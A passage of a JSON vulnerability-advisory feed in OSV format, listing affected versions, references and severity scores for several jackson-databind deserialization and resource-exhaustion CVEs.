serialization gadgets and typing, related to org.aoju.bus.proxy.provider.remoting.RmiProvider (aka bus-proxy).", "affected": [ { "package": { 
"name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.10.4" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.9.10.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/05/GHSA-rf6r-2c4q-2vwg/GHSA-rf6r-2c4q-2vwg.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-10968" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2662" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/05d7e0e13f43e12db6a51726df12c8b4d8040676" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/08fbfacf89a4a4c026a6227a1b470ab7a13e2e88" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html" }, { "type": "WEB", "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200403-0002" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-04-23T19:30:49Z", 
"nvd_published_at": "2020-03-26T13:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-rfx6-vp9g-rh7v", "published": "2018-10-18T17:42:48Z", "modified": "2024-03-11T05:17:47.425595Z", "aliases": [ "CVE-2017-17485" ], "summary": "jackson-databind vulnerable to remote code execution due to incorrect deserialization and blocklist bypass", "details": "FasterXML jackson-databind through 2.8.10 and 2.9.x through 2.9.3 allows unauthenticated remote code execution because of an incomplete fix for the CVE-2017-7525 deserialization flaw. This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the Spring libraries are available in the classpath.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.4" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.2", "2.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-rfx6-vp9g-rh7v/GHSA-rfx6-vp9g-rh7v.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.11" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.10", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-rfx6-vp9g-rh7v/GHSA-rfx6-vp9g-rh7v.json" } }, { "package": { "name": 
"com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.7.9.2" } ] } ], "versions": [ "2.0.0", "2.0.0-RC1", "2.0.0-RC2", "2.0.0-RC3", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4", "2.6.7.5", "2.7.0", "2.7.0-rc1", "2.7.0-rc2", "2.7.0-rc3", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-rfx6-vp9g-rh7v/GHSA-rfx6-vp9g-rh7v.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-17485" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/1855" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/10fe7f17ea7c8da2a71e7a0c774b420a1d5c1b50" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/2235894210c75f624a3d0cd60bfb0434a20a18bf" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/459107dccc9b3ea991af3e6ad0953e54b01ef7c1" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/4f16f67ebd22c7522fdbb8a7eb87e3026a807d61" }, { "type": "WEB", "url": 
"https://github.com/FasterXML/jackson-databind/commit/978798382ceb72229e5036aa1442943933d6d171" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/f031f27a31625d07922bdd090664c69544200a5d" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/eb217dd0f87c5fb471e0668575644aa7eba9a3d3" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/bb45fb16709018842f858f1a6e1118676aaa34bd" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://github.com/irsl/jackson-rce-via-spel" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20180201-0003" }, { "type": "WEB", "url": "https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US\u0026docId=emr_na-hpesbhf03902en_us" }, { "type": "WEB", "url": "https://web.archive.org/web/20200927162225/http://www.securityfocus.com/archive/1/541652/100/0/threaded" }, { "type": "WEB", "url": "https://www.debian.org/security/2018/dsa-4114" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0116" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0342" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0478" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0479" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0480" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0481" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1447" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1448" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1449" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1450" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1451" }, { "type": "WEB", "url": 
"https://access.redhat.com/errata/RHSA-2018:2930" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1782" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1797" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2858" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3149" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3892" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:54:38Z", "nvd_published_at": "2018-01-10T18:29:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-rgv9-q543-rqg4", "published": "2022-10-03T00:00:31Z", "modified": "2024-12-02T16:25:52.858445Z", "aliases": [ "CGA-9vjr-qmvr-wg48", "CVE-2022-42004" ], "related": [ "CGA-3895-m462-85v8", "CGA-53rj-39m2-53xg", "CGA-c8q6-4qp3-vqhh", "CGA-cw73-ccxx-93pc" ], "summary": "Uncontrolled Resource Consumption in FasterXML jackson-databind", "details": "In FasterXML jackson-databind before 2.12.7.1 and in 2.13.x before 2.13.4, resource exhaustion can occur because of a lack of a check in BeanDeserializer._deserializeFromArray to prevent use of deeply nested arrays. 
This issue can only happen when the `UNWRAP_SINGLE_VALUE_ARRAYS` feature is explicitly enabled.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.12.7.1" } ] } ], "versions": [ "2.0.0", "2.0.0-RC1", "2.0.0-RC2", "2.0.0-RC3", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.10.0", "2.10.0.pr1", "2.10.0.pr2", "2.10.0.pr3", "2.10.1", "2.10.2", "2.10.3", "2.10.4", "2.10.5", "2.10.5.1", "2.11.0", "2.11.0.rc1", "2.11.1", "2.11.2", "2.11.3", "2.11.4", "2.12.0", "2.12.0-rc1", "2.12.0-rc2", "2.12.1", "2.12.2", "2.12.3", "2.12.4", "2.12.5", "2.12.6", "2.12.6.1", "2.12.7", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4", "2.6.7.5", "2.7.0", "2.7.0-rc1", "2.7.0-rc2", "2.7.0-rc3", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.11.5", "2.8.11.6", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9", "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.10.4", "2.9.10.5", "2.9.10.6", "2.9.10.7", "2.9.10.8", "2.9.2", "2.9.3", "2.9.4", 
"2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-rgv9-q543-rqg4/GHSA-rgv9-q543-rqg4.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.13.0" }, { "fixed": "2.13.4" } ] } ], "versions": [ "2.13.0", "2.13.1", "2.13.2", "2.13.2.1", "2.13.2.2", "2.13.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-rgv9-q543-rqg4/GHSA-rgv9-q543-rqg4.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42004" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/3582" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/063183589218fec19a9293ed2f17ec53ea80ba88" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/35de19e7144c4df8ab178b800ba86e80c3d84252" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea" }, { "type": "WEB", "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50490" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00035.html" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202210-21" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20221118-0008" }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5283" } ], "database_specific": { "cwe_ids": [ "CWE-400", "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2022-10-04T21:56:21Z", "nvd_published_at": "2022-10-02T05:15:00Z", 
"severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-rpr3-cw39-3pxh", "published": "2022-07-15T19:41:47Z", "modified": "2025-04-14T22:28:33.735201Z", "aliases": [ "CVE-2020-10650" ], "related": [ "CVE-2020-10650" ], "summary": "jackson-databind vulnerable to unsafe deserialization", "details": "The com.fasterxml.jackson.core:jackson-databind library before version 2.9.10.4 is vulnerable to an Unsafe Deserialization vulnerability when handling interactions related to the class `ignite-jta`.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.9.10.4" } ] } ], "versions": [ "2.0.0", "2.0.0-RC1", "2.0.0-RC2", "2.0.0-RC3", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4", "2.6.7.5", "2.7.0", "2.7.0-rc1", "2.7.0-rc2", "2.7.0-rc3", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", 
"2.8.11.5", "2.8.11.6", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9", "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.9.10.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/07/GHSA-rpr3-cw39-3pxh/GHSA-rpr3-cw39-3pxh.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-10650" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2658" }, { "type": "WEB", "url": "https://github.com/luisgarciacheckmarx/LGV_onefile/issues/19" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/pull/2864" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/a424c038ba0c0d65e579e22001dec925902ac0ef" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/04/msg00032.html" }, { "type": "WEB", "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230818-0007" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2022.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2022-07-15T19:41:47Z", "nvd_published_at": "2022-12-26T20:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-v3xw-c963-f5hc", "published": "2020-05-15T18:58:50Z", "modified": 
"2024-02-16T08:09:27.960507Z", "aliases": [ "CVE-2020-11111" ], "summary": "jackson-databind mishandles the interaction between serialization gadgets and typing", "details": "FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.activemq.* (aka activemq-jms, activemq-core, activemq-pool, and activemq-pool-jms).", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.10.4" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.9.10.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/05/GHSA-v3xw-c963-f5hc/GHSA-v3xw-c963-f5hc.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-11111" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2664" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html" }, { "type": "WEB", "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200403-0002" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": 
"https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-04-23T19:31:18Z", "nvd_published_at": "2020-03-31T05:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-v585-23hc-c647", "published": "2021-11-19T20:13:06Z", "modified": "2024-02-18T05:22:38.024460Z", "aliases": [ "CVE-2020-36186" ], "summary": "Unsafe Deserialization in jackson-databind", "details": "FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource`.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.9.10.8" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4", "2.6.7.5", "2.7.0", "2.7.0-rc1", "2.7.0-rc2", "2.7.0-rc3", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", 
"2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.11.5", "2.8.11.6", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9", "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.10.4", "2.9.10.5", "2.9.10.6", "2.9.10.7", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/11/GHSA-v585-23hc-c647/GHSA-v585-23hc-c647.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-36186" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2997" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/3e8fa3beea49ea62109df9e643c9cb678dabdde1" }, { "type": "WEB", "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210205-0005" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2021-03-18T23:16:26Z", "nvd_published_at": "2021-01-06T23:15:00Z", "severity": "HIGH" }, 
"severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-vfqx-33qm-g869", "published": "2021-12-09T19:16:59Z", "modified": "2024-02-18T05:24:26.785781Z", "aliases": [ "CVE-2020-36189" ], "summary": "Unsafe Deserialization in jackson-databind", "details": "FasterXML jackson-databind 2.x before 2.9.10.8 and 2.6.7.5 mishandles the interaction between serialization gadgets and typing, related to com.newrelic.agent.deps.ch.qos.logback.core.db.DriverManagerConnectionSource.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.9.10.8" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.11.5", "2.8.11.6", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9", "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.10.4", "2.9.10.5", "2.9.10.6", "2.9.10.7", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-vfqx-33qm-g869/GHSA-vfqx-33qm-g869.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.6.7.5" } ] } ], "versions": [ "2.0.0", "2.0.0-RC1", "2.0.0-RC2", 
